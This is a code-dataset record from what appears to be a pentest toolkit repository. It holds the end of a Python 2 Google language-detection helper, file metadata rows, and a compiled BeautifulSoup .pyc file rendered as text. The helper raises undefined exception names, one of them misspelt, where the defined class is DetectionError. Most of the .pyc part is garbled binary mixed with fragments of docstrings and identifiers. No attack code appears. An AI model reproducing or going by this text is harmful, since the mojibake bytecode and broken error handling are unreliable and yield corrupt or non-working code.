e: raise TranslationError, "Failed translating, response didn't contain the translation" return None class DetectionError(Exception): pass class Language(object): def __init__(self, lang, confidence, is_reliable): self.lang_code = lang self.lang = _languages[lang] self.confidence = confidence self.is_reliable = is_reliable def __repr__(self): return '<Language: %s (%s)>' % (self.lang_code, self.lang) class LanguageDetector(object): detect_url = "http://ajax.googleapis.com/ajax/services/language/detect?v=1.0&q=%(message)s" def __init__(self): self.browser = Browser() def detect(self, message): """ Given a 'message' detects its language. Returns Language object. """ message = quote_plus(message) real_url = LanguageDetector.detect_url % { 'message': message } try: detection = self.browser.get_page(real_url) data = json.loads(detection) if data['responseStatus'] != 200: raise DetectError, "Failed detecting language: %s" % data['responseDetails'] rd = data['responseData'] return Language(rd['language'], rd['confidence'], rd['isReliable']) except BrowserError, e: raise DetectError, "Failed detecting language (getting %s failed): %s" % (e.url, e.error) except ValueError, e: raise DetectErrro, "Failed detecting language (json failed): %s" % e.message except KeyError, e: raise DetectError, "Failed detecting language, response didn't contain the necessary data" return None _languages = { 'af': 'Afrikaans', 'sq': 'Albanian', 'am': 'Amharic', 'ar': 'Arabic', 'hy': 'Armenian', 'az': 'Azerbaijani', 'eu': 'Basque', 'be': 'Belarusian', 'bn': 'Bengali', 'bh': 'Bihari', 'bg': 'Bulgarian', 'my': 'Burmese', 'ca': 'Catalan', 'chr': 'Cherokee', 'zh': 'Chinese', 'zh-CN': 'Chinese_simplified', 'zh-TW': 'Chinese_traditional', 'hr': 'Croatian', 'cs': 'Czech', 'da': 'Danish', 'dv': 'Dhivehi', 'nl': 'Dutch', 'en': 'English', 'eo': 'Esperanto', 'et': 'Estonian', 'tl': 'Filipino', 'fi': 'Finnish', 'fr': 'French', 'gl': 'Galician', 'ka': 'Georgian', 'de': 'German', 'el': 'Greek', 'gn': 'Guarani', 'gu': 'Gujarati', 'iw': 'Hebrew', 'hi': 'Hindi', 'hu': 'Hungarian', 'is': 'Icelandic', 'id': 'Indonesian', 'iu': 'Inuktitut', 'ga': 'Irish', 'it': 'Italian', 'ja': 'Japanese', 'kn': 'Kannada', 'kk': 'Kazakh', 'km': 'Khmer', 'ko': 'Korean', 'ku': 'Kurdish', 'ky': 'Kyrgyz', 'lo': 'Laothian', 'lv': 'Latvian', 'lt': 'Lithuanian', 'mk': 'Macedonian', 'ms': 'Malay', 'ml': 'Malayalam', 'mt': 'Maltese', 'mr': 'Marathi', 'mn': 'Mongolian', 'ne': 'Nepali', 'no': 'Norwegian', 'or': 'Oriya', 'ps': 'Pashto', 'fa': 'Persian', 'pl': 'Polish', 'pt-PT': 'Portuguese', 'pa': 'Punjabi', 'ro': 'Romanian', 'ru': 'Russian', 'sa': 'Sanskrit', 'sr': 'Serbian', 'sd': 'Sindhi', 'si': 'Sinhalese', 'sk': 'Slovak', 'sl': 'Slovenian', 'es': 'Spanish', 'sw': 'Swahili', 'sv': 'Swedish', 'tg': 'Tajik', 'ta': 'Tamil', 'tl': 'Tagalog', 'te': 'Telugu', 'th': 'Thai', 'bo': 'Tibetan', 'tr': 'Turkish', 'uk': 'Ukrainian', 'ur': 'Urdu', 'uz': 'Uzbek', 'ug': 'Uighur', 'vi': 'Vietnamese', 'cy': 'Welsh', 'yi': 'Yiddish' };
5,645
Python
.py
173
25.647399
130
0.569373
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,920
BeautifulSoup.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/BeautifulSoup.pyc
—Ú ›ªMc@s[dZddklZdZdZdZdZddklZl Z ddk Z ddk Z ddk Z ddkZydd k lZWnej o hZnXe id Ée_d Zd fd ÑÉYZdeefdÑÉYZdefdÑÉYZdefdÑÉYZdefdÑÉYZdefdÑÉYZdefdÑÉYZdfdÑÉYZdefdÑÉYZdÑZdÑZd ÑZ d!eefd"ÑÉYZ!d#e!fd$ÑÉYZ"d%e#fd&ÑÉYZ$d'e"fd(ÑÉYZ%d)e"fd*ÑÉYZ&d+e!fd,ÑÉYZ'd-e!fd.ÑÉYZ(d/e"fd0ÑÉYZ)d1e%fd2ÑÉYZ*d3e&fd4ÑÉYZ+d5e'fd6ÑÉYZ,yddk-Z-Wnej o e.Z-nXyddk/Z0Wnej onXyddk1Z1Wnej onXd7fd8ÑÉYZ2e3d9jo0ddk4Z4e"e4i5i6ÉÉZ7e7i8ÉGHndS(:sÊ Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2007, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. iˇˇˇˇ(t generatorss*Leonard Richardson (leonardr@segfault.org)s3.0.6s*Copyright (c) 2004-2008 Leonard Richardsons New-style BSD(t SGMLParsertSGMLParseErrorN(tname2codepoints[a-zA-Z][-_.:a-zA-Z0-9]*sutf-8t PageElementcBsveZdZdddÑZdÑZdÑZdÑZdÑZdÑZ dhddÑZ dhdddÑZ dhdd ÑZ dhddd ÑZ e Zdhdd ÑZdhddd ÑZeZdhdd ÑZdhdddÑZeZdhdÑZdhddÑZeZdÑZdÑZdÑZdÑZdÑZdÑZdÑZddÑZddÑZ RS(seContains the navigational information for some part of the page (either a tag or a piece of text)cCsk||_||_d|_d|_d|_|io0|iio#|iid|_||i_ndS(sNSets up the initial relations between this element and other elements.iˇˇˇˇN(tparenttprevioustNonetnexttpreviousSiblingt nextSiblingtcontents(tselfRR((s)/pentest/plecost/xgoogle/BeautifulSoup.pytsetupks     cCsö|i}|iii|É}t|dÉoN|i|ijo;|iii|É}|o||jo|d}q|n|iÉ|i||ÉdS(NRi(RR tindexthasattrtextracttinsert(R t replaceWitht oldParenttmyIndexR((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRws # cCsÍ|io1y|iii|ÉWq;tj oq;Xn|iÉ}|i}|io||i_n|o|i|_nd|_d|_d|_|io|i |i_ n|i o|i|i _nd|_|_ |S(s0Destructively rips this element out of the tree.N( RR tremovet ValueErrort_lastRecursiveChildRRRR R (R t lastChildt nextElement((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRÖs(          cCs9|}x,t|dÉo|io|id}q W|S(s8Finds the last element beneath this object to be parsed.R iˇˇˇˇ(RR (R R((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR¢s c Cs<t|tÉpt|tÉo!t|tÉ ot|É}nt|t|iÉÉ}t|dÉoc|idjoS|i|jo5|i |É}|o||jo|d}qæn|i Én||_d}|djod|_ ||_ n6|i|d}||_ ||i _|iÉ|_ |i o||i _n|iÉ}|t|iÉjocd|_|}d}x*|p"|i}|i}|pPqáqáW|o ||_q d|_n:|i|}||_|io||i_ n||_|io||i_ n|ii||ÉdS(NRii(t isinstancet basestringtunicodetNavigableStringtmintlenR RRRtfindRR RR RRR( R tpositiontnewChildRt previousChildtnewChildsLastElementRtparentsNextSiblingt nextChild((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR©sX                    cCs|it|iÉ|ÉdS(s2Appends the given tag to the contents of this tag.N(RRR (R ttag((s)/pentest/plecost/xgoogle/BeautifulSoup.pytappendÂscKs|i|i||||çS(sjReturns the first item that matches the given criteria and appears after this Tag in the document.(t_findOnet findAllNext(R tnametattrsttexttkwargs((s)/pentest/plecost/xgoogle/BeautifulSoup.pytfindNextÈscKs|i|||||i|çS(sbReturns all items that match the given criteria and appear after this Tag in the document.(t_findAllt nextGenerator(R R+R,R-tlimitR.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR*ÓscKs|i|i||||çS(s{Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.(R)tfindNextSiblings(R R+R,R-R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pytfindNextSiblingıscKs|i|||||i|çS(sqReturns the siblings of this Tag that match the given criteria and appear after this Tag in the document.(R0tnextSiblingGenerator(R R+R,R-R2R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR3˚scKs|i|i||||çS(skReturns the first item that matches the given criteria and appears before this Tag in the document.(R)tfindAllPrevious(R R+R,R-R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt findPreviousscKs|i|||||i|çS(scReturns all items that match the given criteria and appear before this Tag in the document.(R0tpreviousGenerator(R R+R,R-R2R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR6scKs|i|i||||çS(s|Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.(R)tfindPreviousSiblings(R R+R,R-R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pytfindPreviousSiblingscKs|i|||||i|çS(srReturns the siblings of this Tag that match the given criteria and appear before this Tag in the document.(R0tpreviousSiblingGenerator(R R+R,R-R2R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR9scKs4d}|i||dÉ}|o|d}n|S(sOReturns the closest parent of this Tag that matches the given criteria.iiN(Rt findParents(R R+R,R.trtl((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt findParents cKs|i||d||i|çS(sFReturns the parents of this Tag that match the given criteria.N(R0RtparentGenerator(R R+R,R2R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR<)scKs7d}||||d|ç}|o|d}n|S(Nii(R(R tmethodR+R,R-R.R=R>((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR)3s c Ksœt|tÉo |}nt||||ç}t|É}|É} xÑto|y| iÉ} Wntj oPnX| oJ|i| É} | o0|i| É|ot|É|joPq¬q∆qGqGW|S(s8Iterates over a generator looking for things that match.( Rt SoupStrainert ResultSettTrueRt StopIterationtsearchR(R( R R+R,R-R2t generatorR.tstrainertresultstgtitfound((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR0:s$    ccs'|}x|o|i}|Vq WdS(N(R(R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR1Ss  ccs'|}x|o|i}|Vq WdS(N(R (R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR5Ys  ccs'|}x|o|i}|Vq WdS(N(R(R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR8_s  ccs'|}x|o|i}|Vq WdS(N(R (R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR;es  ccs'|}x|o|i}|Vq WdS(N(R(R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR@ks  cCs|pd}|id|ÉS(Nsutf-8s%SOUP-ENCODING%(treplace(R tstrtencoding((s)/pentest/plecost/xgoogle/BeautifulSoup.pytsubstituteEncodingrs cCsõt|tÉo|o|i|É}qónjt|tÉo*|o|i|É}qót|É}n0|o|it|É|É}n t|É}|S(sHEncodes an object to a string in some encoding, or to Unicode. .(RRtencodeRNt toEncoding(R tsRO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRRvs N(!t__name__t __module__t__doc__RR RRRRR(R/R*R4R3tfetchNextSiblingsR7R6t fetchPreviousR:R9tfetchPreviousSiblingsR?R<t fetchParentsR)R0R1R5R8R;R@RPRR(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRgs>    <            RcBs/eZdÑZdÑZdÑZedÑZRS(cCsti|ÉfS(N(Rt__str__(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__getnewargs__äscCs/|djo|Std|ii|fÇdS(s™text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.tstrings!'%s' object has no attribute '%s'N(tAttributeErrort __class__RT(R tattr((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __getattr__çs cCst|ÉitÉS(N(RNtdecodetDEFAULT_OUTPUT_ENCODING(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __unicode__ñscCs|o|i|ÉS|SdS(N(RQ(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[ôs(RTRUR\RaRdRcR[(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRàs  tCDatacBseZedÑZRS(cCsdti||ÉS(Ns<![CDATA[%s]]>(RR[(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[°s(RTRURcR[(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyReüstProcessingInstructioncBseZedÑZRS(cCs=|}d|jo|i||É}nd|i||ÉS(Ns%SOUP-ENCODING%s<?%s?>(RPRR(R ROtoutput((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[•s (RTRURcR[(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRf§stCommentcBseZedÑZRS(cCsdti||ÉS(Ns <!--%s-->(RR[(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[¨s(RTRURcR[(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRh´st DeclarationcBseZedÑZRS(cCsdti||ÉS(Ns<!%s>(RR[(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[∞s(RTRURcR[(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRiØstTagcBsŒeZdZdÑZhdd6dd6dd6dd 6d d 6ZeeÉZd ÑZd-d-d-d ÑZd-dÑZ dÑZ dÑZ dÑZ dÑZ dÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZedÑZdÑZeidddÉZd ÑZeed!d"ÑZd#ÑZed$ÑZ eed!d%ÑZ!d-he"d-d&ÑZ#e#Z$d-he"d-d-d'ÑZ%e%Z&e#Z'e%Z(d-e"d-d(ÑZ)d-e"d)ÑZ*d*ÑZ+d+ÑZ,d,ÑZ-RS(.s=Represents a found HTML tag with its attributes and contents.cCs1h}x$|iÉD]\}}|||<qW|S(s Cheap function to invert a hash.(titems(thRKtktv((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt_invert∑s  t'tapost"tquott&tampt<tltt>tgtcCs˛|idÉ}|io|tjott|ÉS||ijo"|io |i|Sd|Snît|Édjoe|ddjoTt|Édjo)|ddjott|ddÉÉStt|dÉÉSn|io d|Sd|Sd S( s—Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.iu&%s;it#txiiu&amp;%s;N( tgrouptconvertHTMLEntitiesRtunichrtXML_ENTITIES_TO_SPECIAL_CHARStconvertXMLEntitiesRtinttescapeUnrecognizedEntities(R tmatchR{((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt_convertEntities∆s   $$  csæ|ià_|i|Éà_|à_|djo g}n|à_gà_ài||Ét à_ t à_ |i à_ |i à_ |ià_áfdÜ}t|àiÉà_dS(sBasic constructor.cs(|\}}|tidài|ÉfS(s&(#\d+|#x[0-9a-fA-F]+|\w+);(tretsubRÑ(t.0Rmtval(R (s)/pentest/plecost/xgoogle/BeautifulSoup.pyt<lambda>Ùs  N(R_t parserClasstisSelfClosingTagt isSelfClosingR+RR,R R tFalsethiddentcontainsSubstitutionsR}RÄRÇtmap(R tparserR+R,RRtconvert((R s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__init__fls           cCs|iÉi||ÉS(sâReturns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.(t _getAttrMaptget(R tkeytdefault((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRï˙scCs|iÉi|ÉS(N(Rîthas_key(R Rñ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRòscCs|iÉ|S(sqtag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.(Rî(R Rñ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __getitem__scCs t|iÉS(s0Iterating over a tag iterates over its contents.(titerR (R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__iter__scCs t|iÉS(s:The length of a tag is the length of its list of contents.(RR (R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__len__ scCs ||ijS(N(R (R R{((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __contains__scCstS(s-A tag is non-None even if it has no contents.(RD(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __nonzero__scCs™|iÉ||i|<t}xUtdt|iÉÉD];}|i|d|jo||f|i|<t}q6q6W|p|ii||fÉn||iÉ|<dS(sKSetting tag[key] sets the value of the 'key' attribute for the tag.iN(RîtattrMapRçtrangeRR,RDR((R RñtvalueRLRK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __setitem__s  cCshxa|iD]V}|d|jo|ii|Én|iÉ|ii|Éo|i|=q q WdS(s;Deleting tag[key] deletes all 'key' attributes for the tag.iN(R,RRîRüRò(R Rñtitem((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt __delitem__%s  cOst|i||ÉS(süCalling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.(tapplytfindAll(R targsR.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__call__0scCsÉt|Édjo2|idÉt|Édjo|i|d ÉS|idÉdjo|i|ÉStd|i|fÇdS(NiRji˝ˇˇˇt__is!'%s' object has no attribute '%s'(RtrfindR R^R_(R R'((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRa6s 3cCsæt|dÉ pat|dÉ pPt|dÉ p?|i|ijp,|i|ijpt|Ét|ÉjotSx@tdt|iÉÉD]&}|i||i|jotSqêWtS(sReturns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?R+R,R i(RR+R,RRçR†R RD(R totherRK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__eq__>sr cCs ||j S(sZReturns true iff this tag is not identical to the other tag, as defined in __eq__.((R R´((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__ne__KscCs |i|ÉS(sRenders this tag as a string.(R[(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt__repr__PscCs |idÉS(N(R[R(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRdTss([<>]|s&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)t)cCs d|i|idÉddS(smUsed with a regular expression to substitute the appropriate XML entity for an XML special character.Rtit;(tXML_SPECIAL_CHARS_TO_ENTITIESR|(R R{((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt _sub_entity[sicCs©|i|i|É}g}|io„x‡|iD]—\}}d}t|ÉoÉ|io#d|jo|i||É}nd|jo-d}d|jo|iddÉ}qµn|ii|i |É}n|i ||i||É|i||ÉfÉq/Wnd} d} |i o d} n d |} d\} } |o"|} d | d } | d } n|i ||| É}|i o |}ng}d}|od d i|É}n|o|i | Én|i d ||| fÉ|o|i dÉn|i |É|o)|o"|ddjo|i dÉn|o| o|i | Én|i | É|o"| o|io|i dÉndi|É}|S(sReturns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.s%s="%s"s%SOUP-ENCODING%Rrs%s='%s'Rps&squot;ts /s</%s>it is<%s%s%s>s iˇˇˇˇ(ii(RRR+R,tisStringRèRPRMtBARE_AMPERSAND_OR_BRACKETRÜR≤R(RåtrenderContentsRétjoinR (R ROt prettyPrintt indentLevelt encodedNameR,RñRàtfmttclosetcloseTagt indentTagtindentContentstspaceR RStattributeString((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[`s`              cCskg}|iD] }||q~}x6|D].}t|tÉo|iÉq+|iÉq+W|iÉdS(s/Recursively destroys the contents of this tree.N(R RRjt decomposeR(R t_[1]RKR ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR√µs$cCs|i|tÉS(N(R[RD(R RO((s)/pentest/plecost/xgoogle/BeautifulSoup.pytprettifyøscCsÎg}x’|D]Õ}d}t|tÉo|i|É}n1t|tÉo |i|i|||ÉÉn|o|o|iÉ}n|oI|o|id|dÉn|i|É|o|idÉq⁄q q Wdi|ÉS(s{Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..R¥is R≥N(RRRR[RjR(tstripR∏(R RORπR∫RStcR-((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR∑¬s"  cKs=d}|i||||d|ç}|o|d}n|S(sLReturn only the first child of this Tag matching the given criteria.iiN(RR¶(R R+R,t recursiveR-R.R=R>((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR Ÿs cKs9|i}|p |i}n|i||||||çS(s’Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.(trecursiveChildGeneratortchildGeneratorR0(R R+R,R»R-R2R.RG((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR¶‰s  cCs|id|d|d|ÉS(NR-R»R2(R¶(R R-R»R2((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt fetchText˘scCs|id|d|ÉS(NR-R»(R (R R-R»((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt firstText¸scCsKt|dÉp4h|_x(|iD]\}}||i|<q#Wn|iS(s^Initializes a map representation of this tag's attributes, if not already initialized.Rü(tgetattrRüR,(R RñR°((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRîs   ccs9x,tdt|iÉÉD]}|i|VqWtÇdS(Ni(R†RR RE(R RK((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR  sccsÍ|dfg}xŒ|o∆|iÉ\}}t|tÉo†xùt|t|iÉÉD]}|i|}|Vt|tÉoW|ioM|t|iÉdjo|i||dfÉn|i|dfÉPqTqTWqqWtÇdS(Nii(tpopRRjR†RR R(RE(R tstackR'tstartRKta((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR…s N(.RTRURVRoRR±RÑRRìRïRòRôRõRúRùRûR¢R§R®RaR¨R≠RcRÆRdRÖtcompileR∂R≤RçR[R√R≈R∑RDR t findChildR¶t findChildrentfirsttfetchRÀRÃRîR R…(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRj≥s^                    T     RBcBsJeZdZdhddÑZdÑZdhdÑZdÑZdÑZRS(sMEncapsulates a number of ways of matching a markup element (tag or text).cKsu||_t|Éo||d<d}n|o.|o|iÉ}|i|Éq_|}n||_||_dS(Ntclass(R+RµRtcopytupdateR,R-(R R+R,R-R.((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRì$s       cCs*|io|iSd|i|ifSdS(Ns%s|%s(R-R+R,(R ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR[2s c CsÖd}d}t|tÉo|}|}nt|iÉot|tÉ }|i pB|p;|o|i||iÉp| o˛|i||iÉoË|o|i||É}n¶t}d}xñ|iiÉD]Ö\}} |pEt |dÉo |}q*h}x"|D]\} } | || <q Wn|i |É} |i| | Ép t }Pq“q“W|o|o |}q}|}qÅn|S(NRï( RRRjtcallableR+t_matchesRDR,RkRRïRç( R t markupNamet markupAttrsRLtmarkuptcallFunctionWithTagDataRÉt markupAttrMapR`t matchAgainstRmRnt attrValue((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt searchTag8sB       cCsÍd}t|ÉoQt|tÉ o@xø|D]1}t|tÉo|i|Éo |}Pq+q+WnÉt|tÉo!|ip|i|É}qÊnRt|tÉp t|Éo$|i ||iÉo |}qÊnt d|i Ç|S(Ns&I don't know how to match against a %s( RtisListRRjRRFR-R„RµR€t ExceptionR_(R RfiRLtelement((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRF]s$    cCsat}|tjo&t|Étijo|dj}n%t|Éo||É}nt|tÉo |i }n|ot |É ot |É}nt |dÉo|o |i |É}nÖt|Éo||j}nht |dÉo|i|É}nE|o=t |Éo0t|t Éot |É}qFt|É}n|p||j}n|S(NRÉRk(RçRDttypettypest BooleanTypeRR⁄RRjR+RµRRRFR‰RòRN(R RfiR·tresult((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR€ws,#   N( RTRURVRRìR[R„RFR€(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRB s  % RCcBseZdZdÑZRS(sTA ResultSet is just a list that keeps track of the SoupStrainer that created it.cCstigÉ||_dS(N(tlistRìtsource(R RÏ((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRìös (RTRURVRì(((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRCóscCs,t|dÉpt|ÉtitifjS(stConvenience method that works with all 2.x versions of Python to determine whether or not something is listlike.Rõ(RRÁRËtListTypet TupleType(R>((s)/pentest/plecost/xgoogle/BeautifulSoup.pyR‰†scCsEy!t|tÉp t|tÉSWntj ot|tÉSXdS(svConvenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.N(RRRt NameErrorRN(RS((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRµ¶s!cGsåh}x|D]w}t|dÉo+x^|iÉD]\}}|||<q0Wq t|Éox&|D]}|||<qbWq |||<q W|S(s±Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.Rk(RRkR‰(RóRßtbuilttportionRmRn((s)/pentest/plecost/xgoogle/BeautifulSoup.pyt buildTagMapÆs  tBeautifulStoneSoupcBs{eZdZhZhZhZhZeidÉdÑfeidÉdÑfgZ dZ dZ dZ dZ e Zhd%d 6d%d 6d%d 6d%d 6d%d 6Zdd%d%ee d%d%dÑZdÑZd%dÑZdÑZdÑZdÑZdÑZdÑZedÑZedÑZdÑZddÑZdÑZdÑZ dÑZ!dÑZ"d ÑZ#d!ÑZ$d"ÑZ%d#ÑZ&d$ÑZ'RS(&sbThis class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.s (<[^<>]*)/>cCs|idÉdS(is />(R|(R{((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRâ€ss<!\s+([^<>]*)>cCsd|idÉdS(s<!iRx(R|(R{((s)/pentest/plecost/xgoogle/BeautifulSoup.pyRâ›su [document]thtmltxmltxhtmli i i i i R≥cCse||_||_||_||_|ioöd|_||ijot|_t|_ t|_ q„||i jot|_t|_ t|_ q„||i jot|_t|_ t|_ q„nt|_t|_ t|_ t d|É|_ti|Ét|dÉo|iÉ}n||_||_y|iÉWntj onXd|_dS(sVThe Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.treadN(tparseOnlyTheset fromEncodingt smartQuotesTotconvertEntitiesRt HTML_ENTITIESRçRÄRDR}RÇtXHTML_ENTITIESt XML_ENTITIESRÚtinstanceSelfClosingTagsRRìRR˜Rfit markupMassaget_feedt StopParsing(R 